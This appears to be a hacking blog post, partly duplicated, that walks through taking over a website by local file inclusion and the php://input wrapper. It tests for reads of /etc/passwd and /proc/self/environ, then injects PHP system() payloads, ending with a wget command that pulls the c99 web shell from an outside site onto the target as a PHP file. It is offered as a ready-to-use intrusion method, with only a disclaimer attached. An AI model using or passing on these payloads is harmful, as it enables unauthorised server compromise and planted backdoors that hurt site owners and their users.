Hey guys,
Today I'll be explaining how to shell a website using "php://input" method via LFI.
So let's get started.
Now let's have our target shall we. As an example, your target URL should look like this:
You can have anything similar to that as long as you can be able to read files and obtain an "include" error.
First things first, give it a shot and see if you can read "/etc/passwd"
URL will look like:
If successful, you'll be having a page that looks like this:
Now lets try reading:
So URL will become:
Hmm, seems like nothing is being displayed, even though I've added a null-byte at the end of the URL.
Well, not to worry, it's time to use our back up method. The "php://input" method will help us read files with certain commands, hence enables us to upload a shell.
This can be done using the "Hackbar" or by using "Live HTTP headers"
I'll show you how to exploit via php://input using the "Hackbar"
So lets check what we're supposed to use in the Hackbar
Now let's try putting this method in action.
Look at the picture carefully.
URL will be:
and POST DATA:
Other commands
List directories
Identification
Convert format
Alright, let's spawn a shell there now shall we.
Grab a shell from sh3ll.org or anywhere else.
For now, we'll be using the normal c99 shell
Let's use the "wget" command to spawn our shell on the site.
So our POST DATA will be:
This is how it's gonna look like.
Now that you've spawn a shell, you can now navigate to your shell on the site.
Have fun.
NOTE: Hacking Peeps Will Not BE Responsible For Any Damages Caused By You
Today I'll be explaining how to shell a website using "php://input" method via LFI.
So let's get started.
Now let's have our target shall we. As an example, your target URL should look like this:
Code:
http://www.site.com/index.php?page=
First things first, give it a shot and see if you can read "/etc/passwd"
URL will look like:
Code:
http://www.site.com/index.php?page=/etc/passwd
 | Click this bar to view the original image of 667x422px. |
Now lets try reading:
Code:
/proc/self/environ /proc/self/fd
Code:
http://www.site.com/index.php?page=/proc/self/environ http://www.site.com/index.php?page=/proc/self/fd
| Click this bar to view the original image of 651x389px. |
Well, not to worry, it's time to use our back up method. The "php://input" method will help us read files with certain commands, hence enables us to upload a shell.
This can be done using the "Hackbar" or by using "Live HTTP headers"
I'll show you how to exploit via php://input using the "Hackbar"
So lets check what we're supposed to use in the Hackbar
| Click this bar to view the original image of 686x190px. |
Now let's try putting this method in action.
Look at the picture carefully.
| Click this bar to view the original image of 800x325px. |
URL will be:
Code:
http://www.site.com/index.php?page=php://input
Code:
<? system('uname -a'); ?>
List directories
Code:
<? system('ls'); ?>
Code:
<? system('id'); ?>
Code:
<? system('mv file.txt file.php'); ?>
Grab a shell from sh3ll.org or anywhere else.
For now, we'll be using the normal c99 shell
Code:
http://www.sh3ll.org/c99.txt?
Let's use the "wget" command to spawn our shell on the site.
So our POST DATA will be:
Code:
<? system('wget http://www.sh3ll.org/c99.txt -O nameofshell.php');?>
| Click this bar to view the original image of 680x173px. |
Now that you've spawn a shell, you can now navigate to your shell on the site.
Code:
http://www.site.com/shell.php
NOTE: Hacking Peeps Will Not BE Responsible For Any Damages Caused By You
No comments:
Post a Comment